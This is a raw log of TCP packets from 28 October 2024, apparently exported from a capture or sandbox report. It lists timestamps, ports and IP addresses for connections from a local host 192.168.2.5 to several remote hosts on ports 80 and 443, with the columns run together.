                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.660600901 CET49863443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.660856962 CET4434986320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.660937071 CET4434986320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.661006927 CET49863443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.678802967 CET4434986413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.679852009 CET4434986413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.679922104 CET49864443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.680124998 CET49864443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.680150032 CET4434986413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.680176020 CET49864443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.680191040 CET4434986413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.683707952 CET49870443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.683736086 CET4434987013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.683828115 CET49870443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.683934927 CET49870443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.683948994 CET4434987013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.729597092 CET4434986713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.730022907 CET4434986713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.730532885 CET49867443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.730613947 CET49867443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.730613947 CET49867443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.730654955 CET4434986713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.730681896 CET4434986713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.733448029 CET49871443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.733490944 CET4434987113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.734628916 CET49871443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.734769106 CET49871443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.734781981 CET4434987113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.764848948 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.764885902 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.764903069 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.764919043 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.764965057 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.764965057 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.765157938 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.765175104 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.765189886 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.765194893 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.765214920 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.765223026 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.765244007 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.765274048 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.765685081 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.765701056 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.765716076 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.765743971 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.765772104 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.768078089 CET49872443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.768110037 CET4434987220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.768171072 CET49872443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.768368006 CET49872443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.768383026 CET4434987220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.841511011 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.841536999 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.841552973 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.841567039 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.841598034 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.841797113 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.841813087 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.841847897 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.841876030 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.906949043 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.907011986 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.907246113 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.907327890 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.960704088 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.960788965 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.960867882 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.960885048 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.960912943 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.960937977 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.961349964 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.961364985 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.961379051 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.961411953 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:34.961448908 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.059808969 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.059873104 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.060071945 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.060132027 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.060391903 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.060445070 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.060676098 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.060720921 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.078416109 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.078473091 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.078592062 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.078607082 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.078623056 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.078630924 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.078639030 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.078664064 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.078717947 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.079039097 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.079091072 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.177715063 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.177736998 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.177751064 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.177820921 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.194808960 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.194878101 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.194899082 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.194938898 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.194977045 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.195003986 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.195143938 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.195318937 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.195383072 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.195421934 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.195436954 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.195483923 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.202621937 CET4434986813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.204679966 CET49868443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.204694033 CET4434986813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.205358982 CET49868443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.205363989 CET4434986813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.216253996 CET4434986913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.216629982 CET49869443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.216655970 CET4434986913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.217147112 CET49869443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.217154026 CET4434986913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.296221018 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.296236992 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.296251059 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.296295881 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.296365023 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.297185898 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.297255993 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.341056108 CET4434986813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.341139078 CET4434986813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.341378927 CET49868443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.341378927 CET49868443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.341404915 CET49868443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.341420889 CET4434986813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.343950987 CET49873443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.343991995 CET4434987313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.344142914 CET49873443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.344281912 CET49873443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.344300985 CET4434987313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.354113102 CET4434986913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.357387066 CET4434986913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.357580900 CET49869443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.357580900 CET49869443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.357610941 CET49869443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.357621908 CET4434986913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.359589100 CET49874443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.359622002 CET4434987413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.359915972 CET49874443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.360050917 CET49874443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.360066891 CET4434987413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.455884933 CET4434987013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.456350088 CET49870443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.456371069 CET4434987013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.456861973 CET49870443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.456866026 CET4434987013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.467353106 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.468002081 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.468018055 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.468082905 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.468178988 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.470606089 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.470621109 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.470771074 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.474225998 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.474242926 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.474308968 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.477648020 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.477663994 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.477678061 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.477696896 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.477746010 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.477956057 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.502384901 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.504461050 CET4434987113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.506982088 CET49871443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.507002115 CET4434987113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.507462025 CET49871443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.507469893 CET4434987113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.533592939 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.539201021 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.539352894 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.539526939 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.546025038 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.606122017 CET4434987013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.606199980 CET4434987013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.606333971 CET49870443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.608886957 CET49870443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.608886957 CET49870443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.608907938 CET4434987013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.608917952 CET4434987013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.625946045 CET49876443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.625974894 CET4434987613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.626211882 CET49876443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.626461983 CET49876443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.626477003 CET4434987613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.639858961 CET4434987113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.639920950 CET4434987113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.640209913 CET49871443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.640436888 CET49871443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.640444040 CET4434987113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.640454054 CET49871443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.640456915 CET4434987113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.642688036 CET49877443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.642713070 CET4434987713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.642926931 CET49877443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.643076897 CET49877443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.643085003 CET4434987713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.872960091 CET4434987220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.873450041 CET49872443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.873488903 CET4434987220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.874073982 CET49872443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.874079943 CET4434987220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.874125004 CET49872443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.874145031 CET4434987220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.087868929 CET4434987313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.088356972 CET49873443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.088428974 CET4434987313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.088816881 CET49873443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.088834047 CET4434987313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.096216917 CET4434987413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.096571922 CET49874443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.096633911 CET4434987413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.096951962 CET49874443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.096966028 CET4434987413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.229033947 CET4434987413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.229094028 CET4434987413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.229247093 CET49874443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.229429007 CET49874443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.229429007 CET49874443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.229460001 CET4434987413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.229484081 CET4434987413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.232177973 CET49878443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.232197046 CET4434987813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.232314110 CET49878443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.232459068 CET49878443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.232470036 CET4434987813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.234282970 CET4434987313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.234849930 CET4434987313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.234954119 CET49873443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.235027075 CET49873443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.235027075 CET49873443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.235061884 CET4434987313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.235086918 CET4434987313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.237108946 CET49879443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.237135887 CET4434987913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.237267017 CET49879443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.237373114 CET49879443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.237385035 CET4434987913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.327950954 CET4434987220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.328038931 CET4434987220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.328092098 CET4434987220.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.328125000 CET49872443192.168.2.520.190.159.0
